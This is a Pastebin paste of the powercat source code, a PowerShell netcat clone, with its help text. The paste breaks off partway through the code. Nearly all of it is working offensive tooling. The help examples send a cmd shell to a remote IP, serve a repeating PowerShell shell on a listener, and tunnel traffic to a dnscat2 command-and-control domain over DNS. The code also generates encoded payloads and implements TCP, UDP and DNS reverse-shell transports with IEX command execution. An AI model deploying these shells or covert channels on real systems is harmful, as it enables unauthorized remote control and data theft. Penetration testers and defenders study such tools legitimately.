hollerith

powercat the best

Mar 11th, 2020
314
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. function powercat
  2. {
  3.   param(
  4.     [alias("Client")][string]$c="",
  5.     [alias("Listen")][switch]$l=$False,
  6.     [alias("Port")][Parameter(Position=-1)][string]$p="",
  7.     [alias("Execute")][string]$e="",
  8.     [alias("ExecutePowershell")][switch]$ep=$False,
  9.     [alias("Relay")][string]$r="",
  10.     [alias("UDP")][switch]$u=$False,
  11.     [alias("dnscat2")][string]$dns="",
  12.     [alias("DNSFailureThreshold")][int32]$dnsft=10,
  13.     [alias("Timeout")][int32]$t=60,
  14.     [Parameter(ValueFromPipeline=$True)][alias("Input")]$i=$null,
  15.     [ValidateSet('Host', 'Bytes', 'String')][alias("OutputType")][string]$o="Host",
  16.     [alias("OutputFile")][string]$of="",
  17.     [alias("Disconnect")][switch]$d=$False,
  18.     [alias("Repeater")][switch]$rep=$False,
  19.     [alias("GeneratePayload")][switch]$g=$False,
  20.     [alias("GenerateEncoded")][switch]$ge=$False,
  21.     [alias("Help")][switch]$h=$False
  22.   )
  23.  
  24.   ############### HELP ###############
  25.   $Help = "
  26. powercat - Netcat, The Powershell Version
  27. Github Repository: https://github.com/besimorhino/powercat
  28.  
  29. This script attempts to implement the features of netcat in a powershell
  30. script. It also contains extra features such as built-in relays, execute
  31. powershell, and a dnscat2 client.
  32.  
  33. Usage: powercat [-c or -l] [-p port] [options]
  34.  
  35.  -c  <ip>        Client Mode. Provide the IP of the system you wish to connect to.
  36.                  If you are using -dns, specify the DNS Server to send queries to.
  37.            
  38.  -l              Listen Mode. Start a listener on the port specified by -p.
  39.  
  40.  -p  <port>      Port. The port to connect to, or the port to listen on.
  41.  
  42.  -e  <proc>      Execute. Specify the name of the process to start.
  43.  
  44.  -ep             Execute Powershell. Start a pseudo powershell session. You can
  45.                  declare variables and execute commands, but if you try to enter
  46.                  another shell (nslookup, netsh, cmd, etc.) the shell will hang.
  47.            
  48.  -r  <str>       Relay. Used for relaying network traffic between two nodes.
  49.                  Client Relay Format:   -r <protocol>:<ip addr>:<port>
  50.                  Listener Relay Format: -r <protocol>:<port>
  51.                  DNSCat2 Relay Format:  -r dns:<dns server>:<dns port>:<domain>
  52.            
  53.  -u              UDP Mode. Send traffic over UDP. Because it's UDP, the client
  54.                  must send data before the server can respond.
  55.            
  56.  -dns  <domain>  DNS Mode. Send traffic over the dnscat2 dns covert channel.
  57.                  Specify the dns server to -c, the dns port to -p, and specify the
  58.                  domain to this option, -dns. This is only a client.
  59.                  Get the server here: https://github.com/iagox86/dnscat2
  60.            
  61.  -dnsft <int>    DNS Failure Threshold. This is how many bad packets the client can
  62.                  recieve before exiting. Set to zero when receiving files, and set high
  63.                  for more stability over the internet.
  64.            
  65.  -t  <int>       Timeout. The number of seconds to wait before giving up on listening or
  66.                  connecting. Default: 60
  67.            
  68.  -i  <input>     Input. Provide data to be sent down the pipe as soon as a connection is
  69.                  established. Used for moving files. You can provide the path to a file,
  70.                  a byte array object, or a string. You can also pipe any of those into
  71.                  powercat, like 'aaaaaa' | powercat -c 10.1.1.1 -p 80
  72.            
  73.  -o  <type>      Output. Specify how powercat should return information to the console.
  74.                  Valid options are 'Bytes', 'String', or 'Host'. Default is 'Host'.
  75.            
  76.  -of <path>      Output File.  Specify the path to a file to write output to.
  77.            
  78.  -d              Disconnect. powercat will disconnect after the connection is established
  79.                  and the input from -i is sent. Used for scanning.
  80.            
  81.  -rep            Repeater. powercat will continually restart after it is disconnected.
  82.                  Used for setting up a persistent server.
  83.                  
  84.  -g              Generate Payload.  Returns a script as a string which will execute the
  85.                  powercat with the options you have specified. -i, -d, and -rep will not
  86.                  be incorporated.
  87.                  
  88.  -ge             Generate Encoded Payload. Does the same as -g, but returns a string which
  89.                  can be executed in this way: powershell -E <encoded string>
  90.  
  91.  -h              Print this help message.
  92.  
  93. Examples:
  94.  
  95.  Listen on port 8000 and print the output to the console.
  96.      powercat -l -p 8000
  97.  
  98.  Connect to 10.1.1.1 port 443, send a shell, and enable verbosity.
  99.      powercat -c 10.1.1.1 -p 443 -e cmd -v
  100.  
  101.  Connect to the dnscat2 server on c2.example.com, and send dns queries
  102.  to the dns server on 10.1.1.1 port 53.
  103.      powercat -c 10.1.1.1 -p 53 -dns c2.example.com
  104.  
  105.  Send a file to 10.1.1.15 port 8000.
  106.      powercat -c 10.1.1.15 -p 8000 -i C:\inputfile
  107.  
  108.  Write the data sent to the local listener on port 4444 to C:\outfile
  109.      powercat -l -p 4444 -of C:\outfile
  110.  
  111.  Listen on port 8000 and repeatedly server a powershell shell.
  112.      powercat -l -p 8000 -ep -rep
  113.  
  114.  Relay traffic coming in on port 8000 over tcp to port 9000 on 10.1.1.1 over tcp.
  115.      powercat -l -p 8000 -r tcp:10.1.1.1:9000
  116.      
  117.  Relay traffic coming in on port 8000 over tcp to the dnscat2 server on c2.example.com,
  118.  sending queries to 10.1.1.1 port 53.
  119.      powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com
  120. "
  121.   if($h){return $Help}
  122.   ############### HELP ###############
  123.  
  124.   ############### VALIDATE ARGS ###############
  125.   $global:Verbose = $Verbose
  126.   if($of -ne ''){$o = 'Bytes'}
  127.   if($dns -eq "")
  128.   {
  129.     if((($c -eq "") -and (!$l)) -or (($c -ne "") -and $l)){return "You must select either client mode (-c) or listen mode (-l)."}
  130.     if($p -eq ""){return "Please provide a port number to -p."}
  131.   }
  132.   if(((($r -ne "") -and ($e -ne "")) -or (($e -ne "") -and ($ep))) -or  (($r -ne "") -and ($ep))){return "You can only pick one of these: -e, -ep, -r"}
  133.   if(($i -ne $null) -and (($r -ne "") -or ($e -ne ""))){return "-i is not applicable here."}
  134.   if($l)
  135.   {
  136.     $Failure = $False
  137.     netstat -na | Select-String LISTENING | % {if(($_.ToString().split(":")[1].split(" ")[0]) -eq $p){Write-Output ("The selected port " + $p + " is already in use.") ; $Failure=$True}}
  138.     if($Failure){break}
  139.   }
  140.   if($r -ne "")
  141.   {
  142.     if($r.split(":").Count -eq 2)
  143.     {
  144.       $Failure = $False
  145.       netstat -na | Select-String LISTENING | % {if(($_.ToString().split(":")[1].split(" ")[0]) -eq $r.split(":")[1]){Write-Output ("The selected port " + $r.split(":")[1] + " is already in use.") ; $Failure=$True}}
  146.       if($Failure){break}
  147.     }
  148.   }
  149.   ############### VALIDATE ARGS ###############
  150.  
  151.   ############### UDP FUNCTIONS ###############
  152.   function Setup_UDP
  153.   {
  154.     param($FuncSetupVars)
  155.     if($global:Verbose){$Verbose = $True}
  156.     $c,$l,$p,$t = $FuncSetupVars
  157.     $FuncVars = @{}
  158.     $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
  159.     if($l)
  160.     {
  161.       $SocketDestinationBuffer = New-Object System.Byte[] 65536
  162.       $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Any), $p
  163.       $FuncVars["Socket"] = New-Object System.Net.Sockets.UDPClient $p
  164.       $PacketInfo = New-Object System.Net.Sockets.IPPacketInformation
  165.       Write-Verbose ("Listening on [0.0.0.0] port " + $p + " [udp]")
  166.       $ConnectHandle = $FuncVars["Socket"].Client.BeginReceiveMessageFrom($SocketDestinationBuffer,0,65536,[System.Net.Sockets.SocketFlags]::None,[ref]$EndPoint,$null,$null)
  167.       $Stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
  168.       while($True)
  169.       {
  170.         if($Host.UI.RawUI.KeyAvailable)
  171.         {
  172.           if(@(17,27) -contains ($Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown").VirtualKeyCode))
  173.           {
  174.             Write-Verbose "CTRL or ESC caught. Stopping UDP Setup..."
  175.             $FuncVars["Socket"].Close()
  176.             $Stopwatch.Stop()
  177.             break
  178.           }
  179.         }
  180.         if($Stopwatch.Elapsed.TotalSeconds -gt $t)
  181.         {
  182.           $FuncVars["Socket"].Close()
  183.           $Stopwatch.Stop()
  184.           Write-Verbose "Timeout!" ; break
  185.         }
  186.         if($ConnectHandle.IsCompleted)
  187.         {
  188.           $SocketBytesRead = $FuncVars["Socket"].Client.EndReceiveMessageFrom($ConnectHandle,[ref]([System.Net.Sockets.SocketFlags]::None),[ref]$EndPoint,[ref]$PacketInfo)
  189.           Write-Verbose ("Connection from [" + $EndPoint.Address.IPAddressToString + "] port " + $p + " [udp] accepted (source port " + $EndPoint.Port + ")")
  190.           if($SocketBytesRead -gt 0){break}
  191.           else{break}
  192.         }
  193.       }
  194.       $Stopwatch.Stop()
  195.       $FuncVars["InitialConnectionBytes"] = $SocketDestinationBuffer[0..([int]$SocketBytesRead-1)]
  196.     }
  197.     else
  198.     {
  199.       if(!$c.Contains("."))
  200.       {
  201.         $IPList = @()
  202.         [System.Net.Dns]::GetHostAddresses($c) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | %{$IPList += $_.IPAddressToString}
  203.         Write-Verbose ("Name " + $c + " resolved to address " + $IPList[0])
  204.         $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse($IPList[0])), $p
  205.       }
  206.       else
  207.       {
  208.         $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse($c)), $p
  209.       }
  210.       $FuncVars["Socket"] = New-Object System.Net.Sockets.UDPClient
  211.       $FuncVars["Socket"].Connect($c,$p)
  212.       Write-Verbose ("Sending UDP traffic to " + $c + " port " + $p + "...")
  213.       Write-Verbose ("UDP: Make sure to send some data so the server can notice you!")
  214.     }
  215.     $FuncVars["BufferSize"] = 65536
  216.     $FuncVars["EndPoint"] = $EndPoint
  217.     $FuncVars["StreamDestinationBuffer"] = New-Object System.Byte[] $FuncVars["BufferSize"]
  218.     $FuncVars["StreamReadOperation"] = $FuncVars["Socket"].Client.BeginReceiveFrom($FuncVars["StreamDestinationBuffer"],0,$FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref]$FuncVars["EndPoint"],$null,$null)
  219.     return $FuncVars
  220.   }
  221.   function ReadData_UDP
  222.   {
  223.     param($FuncVars)
  224.     $Data = $null
  225.     if($FuncVars["StreamReadOperation"].IsCompleted)
  226.     {
  227.       $StreamBytesRead = $FuncVars["Socket"].Client.EndReceiveFrom($FuncVars["StreamReadOperation"],[ref]$FuncVars["EndPoint"])
  228.       if($StreamBytesRead -eq 0){break}
  229.       $Data = $FuncVars["StreamDestinationBuffer"][0..([int]$StreamBytesRead-1)]
  230.       $FuncVars["StreamReadOperation"] = $FuncVars["Socket"].Client.BeginReceiveFrom($FuncVars["StreamDestinationBuffer"],0,$FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref]$FuncVars["EndPoint"],$null,$null)
  231.     }
  232.     return $Data,$FuncVars
  233.   }
  234.   function WriteData_UDP
  235.   {
  236.     param($Data,$FuncVars)
  237.     $FuncVars["Socket"].Client.SendTo($Data,$FuncVars["EndPoint"]) | Out-Null
  238.     return $FuncVars
  239.   }
  240.   function Close_UDP
  241.   {
  242.     param($FuncVars)
  243.     $FuncVars["Socket"].Close()
  244.   }
  245.   ############### UDP FUNCTIONS ###############
  246.  
  247.   ############### DNS FUNCTIONS ###############
  248.   function Setup_DNS
  249.   {
  250.     param($FuncSetupVars)
  251.     if($global:Verbose){$Verbose = $True}
  252.     function ConvertTo-HexArray
  253.     {
  254.       param($String)
  255.       $Hex = @()
  256.       $String.ToCharArray() | % {"{0:x}" -f [byte]$_} | % {if($_.Length -eq 1){"0" + [string]$_} else{[string]$_}} | % {$Hex += $_}
  257.       return $Hex
  258.     }
  259.    
  260.     function SendPacket
  261.     {
  262.       param($Packet,$DNSServer,$DNSPort)
  263.       $Command = ("set type=TXT`nserver $DNSServer`nset port=$DNSPort`nset domain=.com`nset retry=1`n" + $Packet + "`nexit")
  264.       $result = ($Command | nslookup 2>&1 | Out-String)
  265.       if($result.Contains('"')){return ([regex]::Match($result.replace("bio=",""),'(?<=")[^"]*(?=")').Value)}
  266.       else{return 1}
  267.     }
  268.    
  269.     function Create_SYN
  270.     {
  271.       param($SessionId,$SeqNum,$Tag,$Domain)
  272.       return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "00" + $SessionId + $SeqNum + "0000" + $Domain)
  273.     }
  274.    
  275.     function Create_FIN
  276.     {
  277.       param($SessionId,$Tag,$Domain)
  278.       return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "02" + $SessionId + "00" + $Domain)
  279.     }
  280.    
  281.     function Create_MSG
  282.     {
  283.       param($SessionId,$SeqNum,$AcknowledgementNumber,$Data,$Tag,$Domain)
  284.       return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "01" + $SessionId + $SeqNum + $AcknowledgementNumber + $Data + $Domain)
  285.     }
  286.    
  287.     function DecodePacket
  288.     {
  289.       param($Packet)
  290.      
  291.       if((($Packet.Length)%2 -eq 1) -or ($Packet.Length -eq 0)){return 1}
  292.       $AcknowledgementNumber = ($Packet[10..13] -join "")
  293.       $SeqNum = ($Packet[14..17] -join "")
  294.       [byte[]]$ReturningData = @()
  295.      
  296.       if($Packet.Length -gt 18)
  297.       {
  298.         $PacketElim = $Packet.Substring(18)
  299.         while($PacketElim.Length -gt 0)
  300.         {
  301.           $ReturningData += [byte[]][Convert]::ToInt16(($PacketElim[0..1] -join ""),16)
  302.           $PacketElim = $PacketElim.Substring(2)
  303.         }
  304.       }
  305.      
  306.       return $Packet,$ReturningData,$AcknowledgementNumber,$SeqNum
  307.     }
  308.    
  309.     function AcknowledgeData
  310.     {
  311.       param($ReturningData,$AcknowledgementNumber)
  312.       $Hex = [string]("{0:x}" -f (([uint16]("0x" + $AcknowledgementNumber) + $ReturningData.Length) % 65535))
  313.       if($Hex.Length -ne 4){$Hex = (("0"*(4-$Hex.Length)) + $Hex)}
  314.       return $Hex
  315.     }
  316.     $FuncVars = @{}
  317.     $FuncVars["DNSServer"],$FuncVars["DNSPort"],$FuncVars["Domain"],$FuncVars["FailureThreshold"] = $FuncSetupVars
  318.     if($FuncVars["DNSPort"] -eq ''){$FuncVars["DNSPort"] = "53"}
  319.     $FuncVars["Tag"] = ""
  320.     $FuncVars["Domain"] = ("." + $FuncVars["Domain"])
  321.    
  322.     $FuncVars["Create_SYN"] = ${function:Create_SYN}
  323.     $FuncVars["Create_MSG"] = ${function:Create_MSG}
  324.     $FuncVars["Create_FIN"] = ${function:Create_FIN}
  325.     $FuncVars["DecodePacket"] = ${function:DecodePacket}
  326.     $FuncVars["ConvertTo-HexArray"] = ${function:ConvertTo-HexArray}
  327.     $FuncVars["AckData"] = ${function:AcknowledgeData}
  328.     $FuncVars["SendPacket"] = ${function:SendPacket}
  329.     $FuncVars["SessionId"] = ([string](Get-Random -Maximum 9999 -Minimum 1000))
  330.     $FuncVars["SeqNum"] = ([string](Get-Random -Maximum 9999 -Minimum 1000))
  331.     $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
  332.     $FuncVars["Failures"] = 0
  333.    
  334.     $SYNPacket = (Invoke-Command $FuncVars["Create_SYN"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["Tag"],$FuncVars["Domain"]))
  335.     $ResponsePacket = (Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($SYNPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]))
  336.     $DecodedPacket = (Invoke-Command $FuncVars["DecodePacket"] -ArgumentList @($ResponsePacket))
  337.     if($DecodedPacket -eq 1){return "Bad SYN response. Ensure your server is set up correctly."}
  338.     $ReturningData = $DecodedPacket[1]
  339.     if($ReturningData -ne ""){$FuncVars["InputData"] = ""}
  340.     $FuncVars["AckNum"] = $DecodedPacket[2]
  341.     $FuncVars["MaxMSGDataSize"] = (244 - (Invoke-Command $FuncVars["Create_MSG"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["AckNum"],"",$FuncVars["Tag"],$FuncVars["Domain"])).Length)
  342.     if($FuncVars["MaxMSGDataSize"] -le 0){return "Domain name is too long."}
  343.     return $FuncVars
  344.   }
  345.   function ReadData_DNS
  346.   {
  347.     param($FuncVars)
  348.     if($global:Verbose){$Verbose = $True}
  349.    
  350.     $PacketsData = @()
  351.     $PacketData = ""
  352.    
  353.     if($FuncVars["InputData"] -ne $null)
  354.     {
  355.       $Hex = (Invoke-Command $FuncVars["ConvertTo-HexArray"] -ArgumentList @($FuncVars["InputData"]))
  356.       $SectionCount = 0
  357.       $PacketCount = 0
  358.       foreach($Char in $Hex)
  359.       {
  360.         if($SectionCount -ge 30)
  361.         {
  362.           $SectionCount = 0
  363.           $PacketData += "."
  364.         }
  365.         if($PacketCount -ge ($FuncVars["MaxMSGDataSize"]))
  366.         {
  367.           $PacketsData += $PacketData.TrimEnd(".")
  368.           $PacketCount = 0
  369.           $SectionCount = 0
  370.           $PacketData = ""
  371.         }
  372.         $PacketData += $Char
  373.         $SectionCount += 2
  374.         $PacketCount += 2
  375.       }
  376.       $PacketData = $PacketData.TrimEnd(".")
  377.       $PacketsData += $PacketData
  378.       $FuncVars["InputData"] = ""
  379.     }
  380.     else
  381.     {
  382.       $PacketsData = @("")
  383.     }
  384.    
  385.     [byte[]]$ReturningData = @()
  386.     foreach($PacketData in $PacketsData)
  387.     {
  388.       try{$MSGPacket = Invoke-Command $FuncVars["Create_MSG"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["AckNum"],$PacketData,$FuncVars["Tag"],$FuncVars["Domain"])}
  389.       catch{ Write-Verbose "DNSCAT2: Failed to create packet." ; $FuncVars["Failures"] += 1 ; continue }
  390.       try{$Packet = (Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($MSGPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]))}
  391.       catch{ Write-Verbose "DNSCAT2: Failed to send packet." ; $FuncVars["Failures"] += 1 ; continue }
  392.       try
  393.       {
  394.         $DecodedPacket = (Invoke-Command $FuncVars["DecodePacket"] -ArgumentList @($Packet))
  395.         if($DecodedPacket.Length -ne 4){ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..."; $FuncVars["Failures"] += 1 ; continue }
  396.         $FuncVars["AckNum"] = $DecodedPacket[2]
  397.         $FuncVars["SeqNum"] = $DecodedPacket[3]
  398.         $ReturningData += $DecodedPacket[1]
  399.       }
  400.       catch{ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..." ; $FuncVars["Failures"] += 1 ; continue }
  401.       if($DecodedPacket -eq 1){ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..." ; $FuncVars["Failures"] += 1 ; continue }
  402.     }
  403.    
  404.     if($FuncVars["Failures"] -ge $FuncVars["FailureThreshold"]){break}
  405.    
  406.     if($ReturningData -ne @())
  407.     {
  408.       $FuncVars["AckNum"] = (Invoke-Command $FuncVars["AckData"] -ArgumentList @($ReturningData,$FuncVars["AckNum"]))
  409.     }
  410.     return $ReturningData,$FuncVars
  411.   }
  412.   function WriteData_DNS
  413.   {
  414.     param($Data,$FuncVars)
  415.     $FuncVars["InputData"] = $FuncVars["Encoding"].GetString($Data)
  416.     return $FuncVars
  417.   }
  418.   function Close_DNS
  419.   {
  420.     param($FuncVars)
  421.     $FINPacket = Invoke-Command $FuncVars["Create_FIN"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["Tag"],$FuncVars["Domain"])
  422.     Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($FINPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]) | Out-Null
  423.   }
  424.   ############### DNS FUNCTIONS ###############
  425.  
  426.   ########## TCP FUNCTIONS ##########
  427.   function Setup_TCP
  428.   {
  429.     param($FuncSetupVars)
  430.     $c,$l,$p,$t = $FuncSetupVars
  431.     if($global:Verbose){$Verbose = $True}
  432.     $FuncVars = @{}
  433.     if(!$l)
  434.     {
  435.       $FuncVars["l"] = $False
  436.       $Socket = New-Object System.Net.Sockets.TcpClient
  437.       Write-Verbose "Connecting..."
  438.       $Handle = $Socket.BeginConnect($c,$p,$null,$null)
  439.     }
  440.     else
  441.     {
  442.       $FuncVars["l"] = $True
  443.       Write-Verbose ("Listening on [0.0.0.0] (port " + $p + ")")
  444.       $Socket = New-Object System.Net.Sockets.TcpListener $p
  445.       $Socket.Start()
  446.       $Handle = $Socket.BeginAcceptTcpClient($null, $null)
  447.     }
  448.    
  449.     $Stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
  450.     while($True)
  451.     {
  452.       if($Host.UI.RawUI.KeyAvailable)
  453.       {
  454.         if(@(17,27) -contains ($Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown").VirtualKeyCode))
  455.         {
  456.           Write-Verbose "CTRL or ESC caught. Stopping TCP Setup..."
  457.           if($FuncVars["l"]){$Socket.Stop()}
  458.           else{$Socket.Close()}
  459.           $Stopwatch.Stop()
  460.           break
  461.         }
  462.       }
  463.       if($Stopwatch.Elapsed.TotalSeconds -gt $t)
  464.       {
  465.         if(!$l){$Socket.Close()}
  466.         else{$Socket.Stop()}
  467.         $Stopwatch.Stop()
  468.         Write-Verbose "Timeout!" ; break
  469.         break
  470.       }
  471.       if($Handle.IsCompleted)
  472.       {
  473.         if(!$l)
  474.         {
  475.           try
  476.           {
  477.             $Socket.EndConnect($Handle)
  478.             $Stream = $Socket.GetStream()
  479.             $BufferSize = $Socket.ReceiveBufferSize
  480.             Write-Verbose ("Connection to " + $c + ":" + $p + " [tcp] succeeded!")
  481.           }
  482.           catch{$Socket.Close(); $Stopwatch.Stop(); break}
  483.         }
  484.         else
  485.         {
  486.           $Client = $Socket.EndAcceptTcpClient($Handle)
  487.           $Stream = $Client.GetStream()
  488.           $BufferSize = $Client.ReceiveBufferSize
  489.           Write-Verbose ("Connection from [" + $Client.Client.RemoteEndPoint.Address.IPAddressToString + "] port " + $port + " [tcp] accepted (source port " + $Client.Client.RemoteEndPoint.Port + ")")
  490.         }
  491.         break
  492.       }
  493.     }
  494.     $Stopwatch.Stop()
  495.     if($Socket -eq $null){break}
  496.     $FuncVars["Stream"] = $Stream
  497.     $FuncVars["Socket"] = $Socket
  498.     $FuncVars["BufferSize"] = $BufferSize
  499.     $FuncVars["StreamDestinationBuffer"] = (New-Object System.Byte[] $FuncVars["BufferSize"])
  500.     $FuncVars["StreamReadOperation"] = $FuncVars["Stream"].BeginRead($FuncVars["StreamDestinationBuffer"], 0, $FuncVars["BufferSize"], $null, $null)
  501.     $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
  502.     $FuncVars["StreamBytesRead"] = 1
  503.     return $FuncVars
  504.   }
  505.   function ReadData_TCP
  506.   {
  507.     param($FuncVars)
  508.     $Data = $null
  509.     if($FuncVars["StreamBytesRead"] -eq 0){break}
  510.     if($FuncVars["StreamReadOperation"].IsCompleted)
  511.     {
  512.       $StreamBytesRead = $FuncVars["Stream"].EndRead($FuncVars["StreamReadOperation"])
  513.       if($StreamBytesRead -eq 0){break}
  514.       $Data = $FuncVars["StreamDestinationBuffer"][0..([int]$StreamBytesRead-1)]
  515.       $FuncVars["StreamReadOperation"] = $FuncVars["Stream"].BeginRead($FuncVars["StreamDestinationBuffer"], 0, $FuncVars["BufferSize"], $null, $null)
  516.     }
  517.     return $Data,$FuncVars
  518.   }
  519.   function WriteData_TCP
  520.   {
  521.     param($Data,$FuncVars)
  522.     $FuncVars["Stream"].Write($Data, 0, $Data.Length)
  523.     return $FuncVars
  524.   }
  525.   function Close_TCP
  526.   {
  527.     param($FuncVars)
  528.     try{$FuncVars["Stream"].Close()}
  529.     catch{}
  530.     if($FuncVars["l"]){$FuncVars["Socket"].Stop()}
  531.     else{$FuncVars["Socket"].Close()}
  532.   }
  533.   ########## TCP FUNCTIONS ##########
  534.  
  535.   ########## CMD FUNCTIONS ##########
  536.   function Setup_CMD
  537.   {
  538.     param($FuncSetupVars)
  539.     if($global:Verbose){$Verbose = $True}
  540.     $FuncVars = @{}
  541.     $ProcessStartInfo = New-Object System.Diagnostics.ProcessStartInfo
  542.     $ProcessStartInfo.FileName = $FuncSetupVars[0]
  543.     $ProcessStartInfo.UseShellExecute = $False
  544.     $ProcessStartInfo.RedirectStandardInput = $True
  545.     $ProcessStartInfo.RedirectStandardOutput = $True
  546.     $ProcessStartInfo.RedirectStandardError = $True
  547.     $FuncVars["Process"] = [System.Diagnostics.Process]::Start($ProcessStartInfo)
  548.     Write-Verbose ("Starting Process " + $FuncSetupVars[0] + "...")
  549.     $FuncVars["Process"].Start() | Out-Null
  550.     $FuncVars["StdOutDestinationBuffer"] = New-Object System.Byte[] 65536
  551.     $FuncVars["StdOutReadOperation"] = $FuncVars["Process"].StandardOutput.BaseStream.BeginRead($FuncVars["StdOutDestinationBuffer"], 0, 65536, $null, $null)
  552.     $FuncVars["StdErrDestinationBuffer"] = New-Object System.Byte[] 65536
  553.     $FuncVars["StdErrReadOperation"] = $FuncVars["Process"].StandardError.BaseStream.BeginRead($FuncVars["StdErrDestinationBuffer"], 0, 65536, $null, $null)
  554.     $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
  555.     return $FuncVars
  556.   }
  557.   function ReadData_CMD
  558.   {
  559.     param($FuncVars)
  560.     [byte[]]$Data = @()
  561.     if($FuncVars["StdOutReadOperation"].IsCompleted)
  562.     {
  563.       $StdOutBytesRead = $FuncVars["Process"].StandardOutput.BaseStream.EndRead($FuncVars["StdOutReadOperation"])
  564.       if($StdOutBytesRead -eq 0){break}
  565.       $Data += $FuncVars["StdOutDestinationBuffer"][0..([int]$StdOutBytesRead-1)]
  566.       $FuncVars["StdOutReadOperation"] = $FuncVars["Process"].StandardOutput.BaseStream.BeginRead($FuncVars["StdOutDestinationBuffer"], 0, 65536, $null, $null)
  567.     }
  568.     if($FuncVars["StdErrReadOperation"].IsCompleted)
  569.     {
  570.       $StdErrBytesRead = $FuncVars["Process"].StandardError.BaseStream.EndRead($FuncVars["StdErrReadOperation"])
  571.       if($StdErrBytesRead -eq 0){break}
  572.       $Data += $FuncVars["StdErrDestinationBuffer"][0..([int]$StdErrBytesRead-1)]
  573.       $FuncVars["StdErrReadOperation"] = $FuncVars["Process"].StandardError.BaseStream.BeginRead($FuncVars["StdErrDestinationBuffer"], 0, 65536, $null, $null)
  574.     }
  575.     return $Data,$FuncVars
  576.   }
  577.   function WriteData_CMD
  578.   {
  579.     param($Data,$FuncVars)
  580.     $FuncVars["Process"].StandardInput.WriteLine($FuncVars["Encoding"].GetString($Data).TrimEnd("`r").TrimEnd("`n"))
  581.     return $FuncVars
  582.   }
  583.   function Close_CMD
  584.   {
  585.     param($FuncVars)
  586.     $FuncVars["Process"] | Stop-Process
  587.   }  
  588.   ########## CMD FUNCTIONS ##########
  589.  
  590.   ########## POWERSHELL FUNCTIONS ##########
  591.   function Main_Powershell
  592.   {
  593.     param($Stream1SetupVars)  
  594.     try
  595.     {
  596.       $encoding = New-Object System.Text.AsciiEncoding
  597.       [byte[]]$InputToWrite = @()
  598.       if($i -ne $null)
  599.       {
  600.         Write-Verbose "Input from -i detected..."
  601.         if(Test-Path $i){ [byte[]]$InputToWrite = ([io.file]::ReadAllBytes($i)) }
  602.         elseif($i.GetType().Name -eq "Byte[]"){ [byte[]]$InputToWrite = $i }
  603.         elseif($i.GetType().Name -eq "String"){ [byte[]]$InputToWrite = $Encoding.GetBytes($i) }
  604.         else{Write-Host "Unrecognised input type." ; return}
  605.       }
  606.    
  607.       Write-Verbose "Setting up Stream 1... (ESC/CTRL to exit)"
  608.       try{$Stream1Vars = Stream1_Setup $Stream1SetupVars}
  609.       catch{Write-Verbose "Stream 1 Setup Failure" ; return}
  610.      
  611.       Write-Verbose "Setting up Stream 2... (ESC/CTRL to exit)"
  612.       try
  613.       {
  614.         $IntroPrompt = $Encoding.GetBytes("Windows PowerShell`nCopyright (C) 2013 Microsoft Corporation. All rights reserved.`n`n" + ("PS " + (pwd).Path + "> "))
  615.         $Prompt = ("PS " + (pwd).Path + "> ")
  616.         $CommandToExecute = ""      
  617.         $Data = $null
  618.       }
  619.       catch
  620.       {
  621.         Write-Verbose "Stream 2 Setup Failure" ; return
  622.       }
  623.      
  624.       if($InputToWrite -ne @())
  625.       {
  626.         Write-Verbose "Writing input to Stream 1..."
  627.         try{$Stream1Vars = Stream1_WriteData $InputToWrite $Stream1Vars}
  628.         catch{Write-Host "Failed to write input to Stream 1" ; return}
  629.       }
  630.      
  631.       if($d){Write-Verbose "-d (disconnect) Activated. Disconnecting..." ; return}
  632.      
  633.       Write-Verbose "Both Communication Streams Established. Redirecting Data Between Streams..."
  634.       while($True)
  635.       {        
  636.         try
  637.         {
  638.           ##### Stream2 Read #####
  639.           $Prompt = $null
  640.           $ReturnedData = $null
  641.           if($CommandToExecute -ne "")
  642.           {
  643.             try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExecute 2>&1 | Out-String))}
  644.             catch{[byte[]]$ReturnedData = $Encoding.GetBytes(($_ | Out-String))}
  645.             $Prompt = $Encoding.GetBytes(("PS " + (pwd).Path + "> "))
  646.           }
  647.           $Data += $IntroPrompt
  648.           $IntroPrompt = $null
  649.           $Data += $ReturnedData
  650.           $Data += $Prompt
  651.           $CommandToExecute = ""
  652.           ##### Stream2 Read #####
  653.  
  654.           if($Data -ne $null){$Stream1Vars = Stream1_WriteData $Data $Stream1Vars}
  655.           $Data = $null
  656.         }
  657.         catch
  658.         {
  659.           Write-Verbose "Failed to redirect data from Stream 2 to Stream 1" ; return
  660.         }
  661.        
  662.         try
  663.         {
  664.           $Data,$Stream1Vars = Stream1_ReadData $Stream1Vars
  665.           if($Data.Length -eq 0){Start-Sleep -Milliseconds 100}
